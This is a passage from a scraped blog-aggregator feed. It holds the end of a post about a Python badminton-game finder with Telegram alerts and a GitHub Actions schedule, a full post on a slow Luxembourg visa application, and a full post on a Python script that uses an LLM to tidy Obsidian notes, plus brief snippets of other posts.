start_time_local.minute))\n\n            # Check if start time is 7PM (with small tolerance)\n            if (start_hour == desired_start_hour and\n                start_minute >= desired_start_minute and\n                start_minute \u003C desired_start_minute + 10):  # Allow a small window of 10 minutes\n\n                # Check if duration is approximately 1 hour (between 
50-70 minutes)\n                if 50 \u003C= duration_minutes \u003C= 70:\n                    is_time_match = True\n\n            # Check if there are available slots\n            is_available = (\n                not activity.get(\"full\", True) and\n                (activity.get(\"maxPlayers\", 0) == -1 or\n                 activity.get(\"joineeCount\", 0) \u003C activity.get(\"maxPlayers\", 0))\n            )\n\n            # When verbose, print time details for each game to help debug\n            if verbose:\n                time_info = f\"[dim]{activity.get('location', 'Unknown')} - Start: {start_time_local.strftime('%H:%M')} IST ({start_time_utc.strftime('%H:%M')} UTC), \" + \\\n                           f\"End: {end_time_local.strftime('%H:%M')} IST, Duration: {duration_minutes} min, \" + \\\n                           f\"Time match: {'Yes' if is_time_match else 'No'}, Available: {'Yes' if is_available else 'No'}[\u002Fdim]\"\n                console.print(time_info)\n\n            # Both conditions must be true\n            if is_time_match and is_available:\n                matching_games.append({\n                    \"id\": activity[\"id\"],\n                    \"location\": activity[\"location\"],\n                    \"venue_name\": activity.get(\"venueName\", \"N\u002FA\"),\n                    \"start\": start_time_local.strftime(\"%I:%M %p\"),\n                    \"end\": end_time_local.strftime(\"%I:%M %p\"),\n                    \"players\": f\"{activity.get('joineeCount', 0)}\u002F{activity.get('maxPlayers', 'unlimited')}\",\n                    \"host\": activity.get(\"userInfo\", [{}])[0].get(\"fName\", \"Unknown\"),\n                    \"skill\": activity.get(\"skill\", \"Any\"),\n                    \"price\": f\"{activity.get('price', 0)} {activity.get('currencyTxt', 'INR')}\"\n                })\n\n        # Display results\n        if matching_games:\n            table = Table(title=f\"Available Badminton Games ({len(matching_games)} matches found)\")\n\n            table.add_column(\"Location\", style=\"cyan\")\n            table.add_column(\"Time\", style=\"green\")\n            table.add_column(\"Players\", style=\"yellow\")\n            table.add_column(\"Host\", style=\"magenta\")\n            table.add_column(\"Skill Level\", style=\"blue\")\n            table.add_column(\"Link\", style=\"bright_blue\")\n\n            for game in matching_games:\n                table.add_row(\n                    f\"{game['venue_name']}\",\n                    f\"{game['start']} - {game['end']}\",\n                    game[\"players\"],\n                    game[\"host\"],\n                    game[\"skill\"],\n                    f\"https:\u002F\u002Fplayo.co\u002Fmatch\u002F{game['id']}\"\n                )\n\n            console.print(table)\n\n            # Send to Telegram if requested\n            if telegram:\n                if not telegram_token or not telegram_chat_id:\n                    console.print(\"[bold red]Error:[\u002Fbold red] Telegram token and chat ID are required for Telegram notifications\")\n                    console.print(\"[dim]Set them with --telegram-token and --telegram-chat-id or via environment variables[\u002Fdim]\")\n                else:\n                    try:\n                        send_to_telegram(matching_games, telegram_token, telegram_chat_id)\n                        console.print(\"[green]Results sent to Telegram successfully![\u002Fgreen]\")\n                    except Exception as e:\n                        
console.print(f\"[bold red]Error sending to Telegram:[\u002Fbold red] {e}\")\n        else:\n            console.print(\"[yellow]No games found matching your criteria[\u002Fyellow]\")\n            if telegram and telegram_token and telegram_chat_id:\n                try:\n                    asyncio.run(send_telegram_message(\n                        \"No badminton games found matching your criteria for today.\",\n                        telegram_token,\n                        telegram_chat_id\n                    ))\n                    console.print(\"[green]Empty results notification sent to Telegram[\u002Fgreen]\")\n                except Exception as e:\n                    console.print(f\"[bold red]Error sending to Telegram:[\u002Fbold red] {e}\")\n\n    except requests.RequestException as e:\n        console.print(f\"[bold red]Error:[\u002Fbold red] Failed to connect to Playo API: {e}\")\n    except json.JSONDecodeError:\n        console.print(\"[bold red]Error:[\u002Fbold red] Failed to parse API response\")\n    except Exception as e:\n        console.print(f\"[bold red]Error:[\u002Fbold red] An unexpected error occurred: {e}\")\n\ndef send_to_telegram(games, token, chat_id):\n    \"\"\"Send game information to Telegram as a nicely formatted message.\"\"\"\n    if not games:\n        return\n\n    # Create a formatted message for Telegram\n    message = \"🏸 *Available Badminton Games* 🏸\\n\\n\"\n\n    for i, game in enumerate(games, 1):\n        message += f\"*{i}. {game['venue_name']}*\\n\"\n        message += f\"⏰ {game['start']} - {game['end']}\\n\"\n        message += f\"👥 Players: {game['players']}\\n\"\n        message += f\"👤 Host: {game['host']}\\n\"\n        message += f\"🎯 Skill: {game['skill']}\\n\"\n        message += f\"🔗 [Join Game](https:\u002F\u002Fplayo.co\u002Fmatch\u002F{game['id']})\\n\\n\"\n\n    # Send the message\n    asyncio.run(send_telegram_message(message, token, chat_id))\n\nasync def send_telegram_message(message, token, chat_id):\n    \"\"\"Send a message to Telegram using the Bot API.\"\"\"\n    bot = Bot(token=token)\n    await bot.send_message(\n        chat_id=chat_id,\n        text=message,\n        parse_mode=ParseMode.MARKDOWN,\n        disable_web_page_preview=False\n    )\n\n\nif __name__ == \"__main__\":\n    find_games()\nThe script outputs a beautiful output:\n\nTelegram:\n\nScheduling#\nI wanted this script to run reliably every day and used GitHub Actions for that.\nGitHub Actions felt like the path of least resistance as I didn’t have to worry about keeping a server running or getting alerts if something crashed. 
For a small personal script like this, it was the perfect “set it and forget it” solution.\nname: Badminton Game Checker Base\non:\n  # Declare the inputs referenced below; thin caller workflows supply\n  # them (and their own cron schedules) via workflow_call.\n  workflow_call:\n    inputs:\n      latitude:\n        type: string\n        default: \"12.9783692\"\n      longitude:\n        type: string\n        default: \"77.6408356\"\n      radius:\n        type: string\n        default: \"50\"\n      sport_id:\n        type: string\n        default: \"SP5\"\n      timezone:\n        type: string\n        default: \"Asia\u002FKolkata\"\n      start_time:\n        type: string\n        default: \"19:00\"\n      end_time:\n        type: string\n        default: \"20:00\"\n  schedule:\n    # Run Monday to Friday at 12:00 PM IST (6:30 AM UTC)\n    - cron: \"30 6 * * 1-5\"\n\njobs:\n  check-games:\n    runs-on: ubuntu-latest\n\n    env:\n      TELEGRAM_BOT_TOKEN: ${{ secrets.TELEGRAM_BOT_TOKEN }}\n      TELEGRAM_CHAT_ID: ${{ secrets.TELEGRAM_CHAT_ID }}\n      LATITUDE: ${{ inputs.latitude }}\n      LONGITUDE: ${{ inputs.longitude }}\n      RADIUS: ${{ inputs.radius }}\n      SPORT_ID: ${{ inputs.sport_id }}\n      TIMEZONE: ${{ inputs.timezone }}\n      START_TIME: ${{ inputs.start_time }}\n      END_TIME: ${{ inputs.end_time }}\n\n    steps:\n      - name: Checkout code\n        uses: actions\u002Fcheckout@v4\n\n      - name: Set up Python\n        uses: actions\u002Fsetup-python@v5\n        with:\n          python-version: \"3.12\"\n          cache: \"pip\"\n\n      - name: Install dependencies\n        run: |\n          python -m pip install --upgrade pip\n          pip install uv\n\n      - name: Run game check\n        # On the schedule trigger the workflow_call inputs are empty,\n        # so fall back to the same defaults in the shell.\n        run: |\n          echo \"Checking for games from ${START_TIME:-19:00} to ${END_TIME:-20:00}\"\n          uv run finder.py \\\n            --lat \"${LATITUDE:-12.9783692}\" \\\n            --lng \"${LONGITUDE:-77.6408356}\" \\\n            --radius \"${RADIUS:-50}\" \\\n            --sport \"${SPORT_ID:-SP5}\" \\\n            --timezone \"${TIMEZONE:-Asia\u002FKolkata}\" \\\n            --start-time \"${START_TIME:-19:00}\" \\\n            --end-time \"${END_TIME:-20:00}\" \\\n            --telegram\nI used GitHub Actions inputs to configure the variables for my script; the base workflow above declares them under workflow_call, which is what makes the inputs.* references resolve, and thin caller workflows pass them in. Found this feature to be quite neat for scheduling different crons for weekdays\u002Fweekends.\n\nSummary#\nFor small quality-of-life improvements - solving your own specific problems with custom scripts tailored exactly to your needs - gotta love the LLMs man. We’re gonna see more and more of such “personal tooling” in the future as the barrier to entry for coding is lowered with LLMs. The democratization of coding through LLMs means people (even non-technical ones) can focus on “describing” the problem well, rather than struggling with implementation details. Being able to articulate what you want clearly becomes the primary skill - yes, it’s a skill issue if you can’t prompt well, but it’s far more accessible than learning programming from scratch.\nFin!",[],{"slug":710,"title":711,"link":712,"pubDate":713,"contentSnippet":714,"tags":715,"maintainerName":130,"maintainerUsername":131,"maintainerPhoto":132,"feedUrl":133},"open-source-security","Open Source Security: The Good, The Bad, The Vulnerable","https:\u002F\u002Fwww.divyamohan.com\u002Fopen-source-security\u002F","Fri, 28 Feb 2025 04:51:07 GMT","Open source is the backbone of nearly every application in every industry! As great as this may seem for the movement, it raises important questions about our progress.
This panel discussion at the State of Open Conference 2025 explores some of these questions and discusses future implications.",[701,700,699],{"slug":717,"title":718,"link":719,"pubDate":720,"contentSnippet":721,"tags":722,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-7","Becoming a software A-Team via writing culture","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fwriting-practices-to-10x-engineering\u002Findex.html","Fri, 28 Feb 2025 00:00:00 +0000","Strong writing culture transforms merely competent software teams into elite ones; those proverbial 10x product builders. Although creating a high-leverage writing culture requires mindful effort, it is not rocket science and one can start small. So... why, when, and how to do it? Personal opinions ahead. Take what is useful, discard the rest.",[55,54,457,243,723,53,246,227],"systems",{"slug":725,"title":726,"link":727,"pubDate":728,"contentSnippet":729,"tags":730,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-8","Systematically Terraforming a Brownfield of Cloud Infrastructure","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fsystems-approach-to-infrastructure-as-code\u002Findex.html","Tue, 18 Feb 2025 00:00:00 +0000","Some thinking, trade-offs, theory building, and method-making one might end up doing, in the course of bringing Infrastructure as Code (IaC) discipline to brownfield (and greenfield) services, at a small regulated fintech company, having a smaller engineering team that serves several business units, including one of India's largest national tax gateways. Only somewhat easier than reading a long compound sentence without pausing for breath. Phew.",[457,723,731,732,530],"infrastructure","devops",{"slug":734,"title":735,"link":736,"pubDate":737,"contentSnippet":738,"tags":739,"maintainerName":202,"maintainerUsername":203,"maintainerPhoto":204,"feedUrl":205},"deepseek-ai-sovereignty-india","DeepSeek, AI sovereignty, and India","https:\u002F\u002Fnadh.in\u002Fblog\u002Fdeepseek-ai-sovereignty-india\u002F","Wed, 29 Jan 2025 00:00:00 +0000","Along came DeepSeek-R1[1] last week, an open-source large language model (LLM) reportedly rivaling OpenAI’s top offerings, sending shockwaves through the industry and generating much excitement in the tech world. It apparently started as a side project at a Chinese hedge fund before being spun out. Its efficacy, combined with claims of being built at a fraction of the cost and hardware requirements, has seriously challenged BigAI’s notion that “foundation models” demand astronomical investments. I have personally been playing around with R1 and have found it to be excellent at writing code. Speaking of foundation models, one rarely hears that term anymore; unsurprising, given that foundation is now commodity. Building a foundation-level LLM was once touted as the cornerstone of AI sovereignty, but that rhetoric has also waned. Much has changed regarding the idea of AI sovereignty.",[],{"slug":741,"title":742,"link":743,"pubDate":744,"contentSnippet":745,"tags":746,"maintainerName":15,"maintainerUsername":16,"maintainerPhoto":17,"feedUrl":18},"deepseek-r1","DeepSeek R1: Revolutionizing AI with Open Source and DeepThinking","https:\u002F\u002Fibcomputing.com\u002Fdeepseek-r1\u002F","Wed, 22 Jan 2025 17:28:59 +0000","Artificial intelligence continues to evolve at a rapid pace, and DeepSeek R1 is at the forefront of this transformation.
Building on the success of DeepSeek … \nThe post DeepSeek R1: Revolutionizing AI with Open Source and DeepThinking appeared first on IB Computing.",[747,13,748],"AI","artificial intelligence",{"slug":750,"title":751,"link":752,"pubDate":753,"contentSnippet":754,"tags":755,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"luxembourg-visa-process","The Arduous Luxembourg Visa Process","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fluxembourg-visa-process\u002F","Tue, 21 Jan 2025 16:15:57 +0530","In 2024, I was sponsored by The Document Foundation (TDF) to attend the LibreOffice annual conference in Luxembourg from the 10th to the 12th of October. Being an Indian passport holder, I needed a visa to visit Luxembourg. However, due to my Kenya trip coming up in September, I ran into a dilemma: whether to apply before or after the Kenya trip.\nTo obtain a visa, I needed to submit my application with VFS Global (and not with the Luxembourg embassy directly). Therefore, I checked the VFS website for information on processing time, which says:\nAs a rule, the processing time of an admissible Schengen visa application should not exceed 15 calendar days (from the date the application is received at the Embassy).\nIt also mentions:\nIf the application is received less than 15 calendar days before the intended travel date, the Embassy can deem your application inadmissible. If so, your visa application will not be processed by the Embassy and the application will be sent back to VFS along with the passport.\nIf I applied for the Luxembourg visa before my trip, I would run the risk of not getting my passport back in time, and therefore missing my Kenya flight. On the other hand, if I waited until after returning from Kenya, I would not leave the embassy the aforementioned 15 calendar days needed to process my application.\nI had previously applied for a Schengen visa for Austria, which was completed in 7 working days. My friends who had been to France told me they got their visa decision within a week. So, I compared Luxembourg’s application numbers with those of other Schengen countries. In 2023, Luxembourg received 3,090 applications from India, while Austria received 39,558, Italy received 52,332 and France received 176,237. Since Luxembourg receives far fewer applications, I expected the process to be quick.\nTherefore, I submitted my visa application with VFS Global in Delhi on the 5th of August, giving the embassy a month with 18 working days before my Kenya trip. However, I didn’t mention my Kenya trip in the Luxembourg visa application.\nFor reference, here is a list of documents I submitted:\nPassport\nPhotocopy of passport data pages\nVisa application form\nOne photograph\nVisa appointment confirmation\nCover letter\nReturn flight reservations\nHotel bookings\nInvitation letter from the conference organizer, TDF\nConfirmation from The Luxembourg Convention Bureau G.I.E - the venue\nLast three months’ bank account statement with bank seal\nTravel insurance\nIncome Tax Return Statement\nMonthly payslips for the last three months\nI submitted ‘flight reservations’ instead of ‘flight tickets’. This is because, in case of a visa rejection, I would have lost a significant amount of money had I booked confirmed flight tickets. The embassy also recommends the same.
After the submission of documents, my fingerprints were taken.\nThe expenses for the visa application were as follows:\n\nService Description: Amount (INR)\nVisa Fee: 8,114\nVFS Global Fee: 1,763\nCourier: 800\nTotal: 10,677\n\nGoing by the email notifications I received from VFS, my application reached the Luxembourg embassy the next day. Fast-forward to the 27th of August — the 14th day since my visa application. I had already booked my flight ticket to Nairobi for the 4th of September, but my passport was still with the Luxembourg embassy, and I hadn’t heard back. In addition, I obtained Kenya’s eTA and got vaccinated against Yellow Fever, a requirement to travel to Kenya.\nIn order to check on my application status, I gave the embassy a phone call, but missed their calling window, which was easy to do since it was only one hour long - 12:00 to 1:00 PM. So, I dropped them an email explaining my situation. At this point, I was already wondering whether to cancel the Kenya trip or the Luxembourg one, if I had to choose.\nAfter not getting a response to my email, I called them again the next day. The embassy told me they would look into it and asked me to send my flight tickets over email. One week to go before my flight now.\nI followed up with the embassy on the 30th by a phone call, and the person who picked up the call told me that my request had already been forwarded to the concerned department and was being processed. They asked me to follow up on Monday, 2nd September.\nDuring the visa process, I was in touch with three other Indian attendees.1 In the meantime, I got to know that all of them had applied for a Luxembourg visa by the end of August.\nBack to our story: over the next two days, the embassy was closed for the weekend. I began weighing my options. On one hand, I could cancel the Kenya trip and hope that Luxembourg goes through. Even then, Luxembourg wasn’t guaranteed as the visa could get rejected, so I might have ended up missing both trips. On the other hand, I could cancel the Luxembourg visa application and at least be sure of going to Kenya. However, I thought it would make Luxembourg very unlikely because it wouldn’t leave the embassy 15 calendar days to process my visa after I returned from Kenya. I also badly wanted to attend the LibreOffice conference because I couldn’t make it two years ago. Therefore, I chose not to cancel my Luxembourg visa application. I checked with my travel agent and learned that I could cancel my Nairobi flight before September 4th for a cancellation fee of approximately 7,000 INR.\nOn the 2nd of September, I was a bit frustrated because I hadn’t heard anything from the embassy regarding my request. Therefore, I called the embassy again. They assured me that they would arrange a call for me from the concerned department that day, which I did receive later that evening. During the call, they offered to return my passport via VFS the next day and asked me to resubmit it after returning from Kenya. I immediately accepted the offer and was overjoyed, as it would enable me to take my flight to Nairobi without canceling my Luxembourg visa application. However, I didn’t have the offer in writing, so it wasn’t clear to me how I would collect my passport from VFS. The confirmation arrived the next day, when I was already on my way to VFS, in the form of an email from the embassy which read:\nDear Mr.
Dwivedi,\nWe acknowledge the receipt of your email.\nAs you requested, we are returning your passport exceptionally through VFS, you can collect it directly from VFS Delhi Center between 14:00-17:00 hrs, 03 Sep 2024. Kindly bring the printout of this email along with your VFS deposit receipt and Original ID proof.\nOnce you are back from your trip, you can redeposit the passport with VFS Luxembourg for our processing.\nWith best regards,\nGRAND DUCHY OF LUXEMBOURG\nI took a printout of the email and submitted it to VFS to get my passport. This seemed like a miracle - just when I had lost all hope of making it to my Kenya flight and was mentally preparing myself to miss it, I got my passport back “exceptionally”, and now I had to mentally prepare for Kenya again. I had never before heard of an embassy returning a passport before completing the visa process. The next day, I took my flight to Nairobi as planned. In case you are interested, I have written two blog posts on my Kenya trip - one on the OpenStreetMap conference in Nairobi and the other on my travel experience in Kenya.\nAfter returning from Kenya, I resubmitted my passport on the 17th of September. Fast-forward to the 25th of September: I still hadn’t heard anything from the embassy about my application. So, I checked with TDF to see whether the embassy had reached out to them. They told me they had confirmed my participation and my hotel booking to the visa authorities on the 19th of September (six days earlier). I was wondering what was taking so long after the verification.\nOn the 1st of October, I received a phone call from the Luxembourg embassy, which turned out to be a surprise interview. They asked me about my work, my income, how I came to know about the conference, whether I had been to Europe before, etc. The call lasted around 10 minutes. At this point, my travel date - 8th of October - was just two working days away as the 2nd of October was off due to Gandhi Jayanti and the 5th and 6th of October were the weekend, leaving only the 3rd and the 4th. I am not sure why the embassy saved this for the last moment, even though I had submitted my application two months earlier. I also got to know that one of the other Indian attendees missed the call because he was in his college lab, where he was not allowed to take phone calls. Therefore, I recommend that the embassy agree on a time slot for the interview call beforehand.\nVisa decisions for all the above-mentioned Indian attendees were sent by the embassy on the 4th of October, and I received mine on the 5th. For my travel date of 8th October, this was literally the last moment the embassy could send my visa. The parcel contained my passport and a letter. The visa was attached to a page in the passport. I was happy that my visa had been approved. However, the timing made my task challenging.
The enclosed letter stated:\nSubject: Your Visa Application for Luxembourg\nDear Applicant,\nWe would like to inform you that a Schengen visa has been granted for the 8-day duration from 08\u002F10\u002F2024 to 30\u002F10\u002F2024 for conference purposes in Luxembourg.\nYou are requested to report back to the Embassy of Luxembourg in New Delhi through an email (email address redacted) after your return with the following documents:\nImmigration Stamps (Entry and Exit of Schengen Area)\nRestaurant Bills\nShopping\u002FHotel\u002FAccommodation bills\nFailure to report to the Embassy after your return will be taken into consideration for any further visa applications.\nI understand the embassy wanting to ensure my entry and exit from the Schengen area during the visa validity period, but found the demand for sending shopping bills excessive. Further, not everyone was as lucky as I was: one of the Indian attendees received their visa a couple of days later, delaying their plans. Another attendee had to send their father to the VFS center to collect their visa in time, rather than wait for the courier to arrive at their home.\nForeign travel is complicated, especially for the citizens of countries whose passports and currencies are weak. Embassies issuing visas a day before the travel date doesn’t help. For starters, a last-minute visa does not give enough time for obtaining a forex card as banks ask for the visa. Further, getting foreign currency (Euros in our case) in cash with a good exchange rate becomes difficult. As an example, for the Kenya trip, I had to get US Dollars at the airport due to the plan being finalized at the last moment, worsening the exchange rate. Back to the current case, the flight prices went up significantly compared to September, almost doubling. The choice of airlines also narrowed, as most of the flights were booked out by the time I received my visa. With all that said, I think it was still better than an arbitrary rejection.\nCredits: Contrapunctus, Badri, Fletcher, Benson, and Anirudh for helping with the draft of this post.\nThanks to Sophie, our point of contact for the conference, for putting me in touch with them. ↩︎",[],{"slug":757,"title":758,"link":759,"pubDate":760,"contentSnippet":761,"tags":762,"maintainerName":150,"maintainerUsername":151,"maintainerPhoto":152,"feedUrl":153},"the-feeling-of-thoughts","The feeling of thoughts","https:\u002F\u002Fwww.prashanthudupa.com\u002Fthe-feeling-of-thoughts\u002F","Mon, 20 Jan 2025 16:25:36 +0000","When I look at an object, like the cup on the table next to my laptop right now, the visual feel of the object is entirely driven by the physical object itself. In this case, I am not imagining or making up the visual feel of the cup. It looks the way the cup intends […]",[148,149],{"slug":764,"title":765,"link":766,"pubDate":767,"contentSnippet":768,"tags":769,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"cleanup-obsidian","Cleaning up Notes with LLM","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fcleanup-obsidian\u002F","2025-01-03T04:45:00.000Z","My Obsidian vault has gotten quite messy over time. I’ve been dumping notes without proper frontmatter, tags were all over the place, and some notes didn’t even have proper titles! I needed a way to clean this up without spending hours manually organizing everything.\nI’d been playing around with Claude’s API lately, and thought – hey, why not use an LLM to analyze my notes and add proper frontmatter?
After all, that’s what these AI models are good at – understanding context and categorizing stuff.\nI wrote a small Python script using the llm library (which is pretty neat btw) to do just this. Here’s what it looks like:\nimport llm\nimport os\nimport yaml\nimport datetime\nfrom pathlib import Path\nimport re\n\nclass ObsidianNoteProcessor:\n    def __init__(self, notes_dir, model_name=\"claude-3.5-sonnet\"):\n        self.notes_dir = Path(notes_dir)\n        self.model = llm.get_model(model_name)\n        \n    def extract_existing_frontmatter(self, content):\n        \"\"\"Extract existing frontmatter if present.\"\"\"\n        frontmatter_pattern = r'^---\\n(.*?)\\n---\\n'\n        match = re.match(frontmatter_pattern, content, re.DOTALL)\n        \n        if match:\n            try:\n                return yaml.safe_load(match.group(1)), content[match.end():]\n            except yaml.YAMLError:\n                return {}, content\n        return {}, content\n\n    def generate_prompt(self, content):\n        \"\"\"Generate a prompt for the LLM to analyze the note content.\"\"\"\n        return f\"\"\"Analyze the following note content and extract\u002Finfer the following properties:\n1. A clear title (if not present, generate from content)\n2. Relevant categories based on the content\n3. Appropriate tags (include 'inbox' if content seems draft-like)\n4. Status (Draft\u002FIn Progress\u002FComplete) based on content completeness\n5. Priority (Low\u002FMedium\u002FHigh) based on content importance\n6. A brief description summarizing the content\n\nNote content:\n{content}\n\nReturn ONLY the YAML frontmatter without any code block markers. Use this exact format (omit fields if not applicable):\ntitle: \u003Ctitle>\ncategory: \u003Ccategory>\ntags:\n  - tag1\n  - tag2\nstatus: \u003Cstatus>\npriority: \u003Cpriority>\ndescription: \u003Cdescription>\"\"\"\n\n    def clean_llm_response(self, response_text):\n        \"\"\"Clean up the LLM response to ensure proper YAML.\"\"\"\n        # Remove yaml code block markers if present\n        response_text = response_text.strip()\n        if response_text.startswith('```yaml'):\n            response_text = response_text.split('\\n', 1)[1]\n        if response_text.endswith('```'):\n            response_text = response_text.rsplit('\\n', 1)[0]\n        return response_text.strip()\n\n    def process_note(self, file_path):\n        \"\"\"Process a single note file.\"\"\"\n        try:\n            with open(file_path, 'r', encoding='utf-8') as f:\n                content = f.read()\n            \n            # Extract existing frontmatter and content\n            existing_frontmatter, main_content = self.extract_existing_frontmatter(content)\n            \n            # Generate and execute prompt\n            response = self.model.prompt(self.generate_prompt(main_content))\n            response_text = self.clean_llm_response(response.text())\n            \n            try:\n                new_frontmatter = yaml.safe_load(response_text)\n                if not isinstance(new_frontmatter, dict):\n                    print(f\"Warning: Invalid response format for {file_path.name}\")\n                    new_frontmatter = {}\n            except yaml.YAMLError as e:\n                print(f\"YAML parsing error for {file_path.name}\")\n                print(f\"Response text was:\\n{response_text}\")\n                raise e\n            \n            # Merge with existing frontmatter, preferring existing values\n            merged_frontmatter = 
{**new_frontmatter, **existing_frontmatter}\n            \n            # Add date if not present\n            if 'date' not in merged_frontmatter:\n                merged_frontmatter['date'] = datetime.date.today().isoformat()\n            \n            # Generate new note content\n            new_content = \"---\\n\"\n            new_content += yaml.dump(merged_frontmatter, sort_keys=False, allow_unicode=True)\n            new_content += \"---\\n\\n\"\n            new_content += main_content.strip()\n            \n            # Write back to file\n            with open(file_path, 'w', encoding='utf-8') as f:\n                f.write(new_content)\n                \n            print(f\"✓ Processed: {file_path.name}\")\n            \n        except Exception as e:\n            print(f\"✗ Error processing {file_path.name}: {str(e)}\")\n\n    def process_vault(self):\n        \"\"\"Process all markdown files in the vault.\"\"\"\n        print(\"Starting Obsidian vault cleanup...\")\n        \n        for file_path in self.notes_dir.glob('**\u002F*.md'):\n            self.process_note(file_path)\n        \n        print(\"\\nVault cleanup completed!\")\n\ndef main():\n    # Set up the model key if not already configured\n    model = llm.get_model(\"claude-3.5-sonnet\")\n    if not hasattr(model, 'key'):\n        api_key = os.getenv('ANTHROPIC_API_KEY')\n        if not api_key:\n            raise ValueError(\"Please set ANTHROPIC_API_KEY environment variable\")\n        model.key = api_key\n    \n    # Initialize and run the processor\n    notes_dir = \"\u002FUsers\u002Fkaran\u002FNotes\u002FObsidian\u002FThe Wall\u002FNotes\"\n    processor = ObsidianNoteProcessor(notes_dir)\n    processor.process_vault()\n\nif __name__ == \"__main__\":\n    main()\n\nThe script is pretty straightforward – it reads each markdown file, extracts any existing frontmatter (because I don’t want to lose that!), and then asks Claude to analyze the content and generate appropriate frontmatter. It adds stuff like title, category, tags, status, priority.\nWhat I love about this approach is that it’s contextual. Unlike regex-based approaches or keyword matching, the LLM actually understands what the note is about and can categorize it properly. A note about “Setting up BTRFS on Arch” automatically gets tagged with “linux”, “filesystem”, “arch” without me having to maintain a predefined list of tags. The categorization is probably better than what I’d have done manually at 2 AM while organizing my notes!\nFin!",[],{"slug":771,"title":772,"link":773,"pubDate":774,"contentSnippet":775,"tags":776,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-9","Here's to Quarter Two of the 21st century","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fhello-quarter-two-of-the-21st-century\u002Findex.html","Wed, 01 Jan 2025 00:00:00 +0000","The first quarter elapsed. Much happened. Much didn’t. We-who-are-reading-this-right-now are perhaps a bit bruised, disheveled, a little worse for the wear, and horribly hung over. But alive. Except you, Mx. LLM. 
Who knows what’s next?",[55,49],{"slug":778,"title":779,"link":780,"pubDate":781,"contentSnippet":782,"tags":783,"maintainerName":68,"maintainerUsername":69,"maintainerPhoto":70,"feedUrl":71},"tholkappiyam-discussion","tholkappiyam discussion","https:\u002F\u002Fprogrammerlife1.wordpress.com\u002F2024\u002F12\u002F23\u002Ftholkappiyam-discussion\u002F","Mon, 23 Dec 2024 17:19:27 +0000","Discussion – Dec 23, 2024. Date and Time: Dec 7, 2024, 20:30-22:00 IST. Members Joined. Topics discussed: Cosmetics: Where to maintain the code base? Contribution Related: Language to be maintained in the code? TBD. Codebase: -> check point => Jan 20th.",[224],{"slug":785,"title":786,"link":787,"pubDate":788,"contentSnippet":789,"tags":790,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"2024","2024: A Year In Review","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002F2024\u002F","2024-12-23T06:30:00.000Z","2024 was indeed an important year for me as it marked several significant milestones. Quite happy with how this year was! Here’s\nmy reflection on this memorable year.\nLife#\nGot married to the prettiest and dearest Saumya 💗\nDid my first international trip, exploring Europe\nBought a fun toy - Maruti Jimny 4x4\nRelocated to Bangalore after working from home for 4+ years since Covid\nAttended several amazing concerts:\n\nIndian Ocean\nParvaaz\nBlackstratblues\nAnand Bhaskar Collective\nBandland\nTravel#\nSwitzerland\nItaly\nAustria\nBinsar\nCochin\nAjmer\nRanthambore\nPondicherry\nChennai\nProjects#\nReleased v1.0.0 of Doggo - it hit the front page of HN as well!\nBuilt an expense tracker app - Gullak\nMade a lot of small utility apps:\n\nlil - URL shortener\nsilencer - Prometheus alerts \u003C> Mattermost bridge\ntoru - Go modules proxy with caching\njunbi - Server Setup and Hardening Tool\nOvenly Delights - Small bakery shop website\nnomcfg - Nomad config generator\nclx - Generate CLI commands using AI for common ops\nStarted working on a log analytics app - full focus on that in 2025. Read more\nThis year has been truly transformative, bringing together personal joy, professional growth, and exciting adventures. Looking forward to what 2025 has in store!",[],{"slug":792,"title":793,"link":794,"pubDate":795,"contentSnippet":796,"tags":797,"maintainerName":611,"maintainerUsername":612,"maintainerPhoto":613,"feedUrl":614},"donate","Donate","https:\u002F\u002Fshrirangkahale.com\u002Fdonate\u002F","Fri, 13 Dec 2024 00:00:00 +0000","I run a non-profit FOSS mirror service which serves thousands of people daily.\nIndia is a vast country, and with the increasing popularity of FOSS, more and more mirrors are needed. Compared to other countries, we have very few mirrors, and we are working to improve the situation.\nCurrently, we have mirror nodes in three cities in India: Nagpur, Mumbai and Chennai. We are working on deploying another mirror node in Hyderabad.",[],{"slug":799,"title":800,"link":801,"pubDate":802,"contentSnippet":803,"tags":804,"maintainerName":68,"maintainerUsername":69,"maintainerPhoto":70,"feedUrl":71},"kanchilug-engine-mode","Kanchi-LUG: A new journey, on a new path","https:\u002F\u002Fprogrammerlife1.wordpress.com\u002F2024\u002F12\u002F03\u002Fkanchilug-engine-mode\u002F","Tue, 03 Dec 2024 18:29:55 +0000","Dec 3, 2024: In the weekly meeting and on the mailing list, Mr. Parameswar Arunachalam announced that he was stepping down from the coordinator role of the Kanchipuram Linux User Group.
Ever since I joined the Kanchi Linux User Group, Parameswar had been conducting the weekly and monthly meetings excellently. In the coming weeks, I will be taking over as the coordinator, to conduct the weekly and monthly meetings just as well as he did. In taking up and carrying out a few responsibilities, good administrative skill […]",[224],{"slug":806,"title":807,"link":808,"pubDate":809,"contentSnippet":810,"tags":811,"maintainerName":68,"maintainerUsername":69,"maintainerPhoto":70,"feedUrl":71},"curlftpfs-a-glance","curlftpfs – A Glance","https:\u002F\u002Fprogrammerlife1.wordpress.com\u002F2024\u002F12\u002F01\u002Fcurlftpfs-a-glance\u002F","Sun, 01 Dec 2024 11:33:37 +0000","CurlFtpFS – A FTP filesystem based on cURL and FUSE. So what is it useful for? You can access an FTP site through a file manager (nautilus, nemo, etc.) just as if it were on your hard disk. How to install it? You can install it by running the given command. How to use it? First, create a directory in your filesystem for the FTP site you are going to use (give the directory 777 permission). Then run any one of the following commands […]",[224],{"slug":813,"title":814,"link":815,"pubDate":816,"contentSnippet":817,"tags":818,"maintainerName":68,"maintainerUsername":69,"maintainerPhoto":70,"feedUrl":71},"how-to-create-publish-a-php-package-with-composer-e0-ae-a4-e0-ae-ae-e0-ae-bf-e0-ae-b4-e0-ae-bf-e0-ae","How to Create & Publish a PHP 